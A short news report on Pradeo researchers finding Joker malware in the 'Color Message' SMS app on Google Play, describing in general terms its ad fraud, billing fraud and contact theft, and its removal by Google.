    Over half a million Android users have installed an app used to deliver Joker malware after downloading it from the Google Play store. Cybersecurity researchers at Pradeo identified the malware, which Google has now removed from its official Android app marketplace. Before its removal, the app, called ‘Color Message’, was downloaded by more than 500,000 Android users.


    Advertised as an app that allowed users to personalise their default SMS messages, Color Message was a front to deliver Joker, one of the most prolific families of Android malware. Once installed, the malware does three things: it simulates clicks to generate revenue from malicious ads; subscribes users to unwanted paid premium services to steal money and commit billing fraud; and accesses users’ contact lists and sends the information to attackers. Researchers say there is evidence that the stolen information is sent to servers hosted in Russia. Negative reviews of the app on the Play Store suggest some users noticed the unauthorised behaviour, with complaints about being charged for services they had not requested. Google Play has review processes designed to stop malicious apps from being published, but the developers of this app managed to get past them.

    “By using as little code as possible and thoroughly hiding it, Joker generates a very discreet footprint that can be tricky to detect,” said Pradeo’s Roxane Suau. Users who have downloaded Color Message from the Google Play Store have been urged to uninstall the app immediately. This is far from the first time Joker has been found in the Play Store: Pradeo says it has turned up in hundreds of apps over the past two years, and given how persistent those behind it are, they are likely to try to distribute the malware again. ZDNet contacted Google for comment; a spokesperson confirmed that the malicious app has been removed from the Play Store.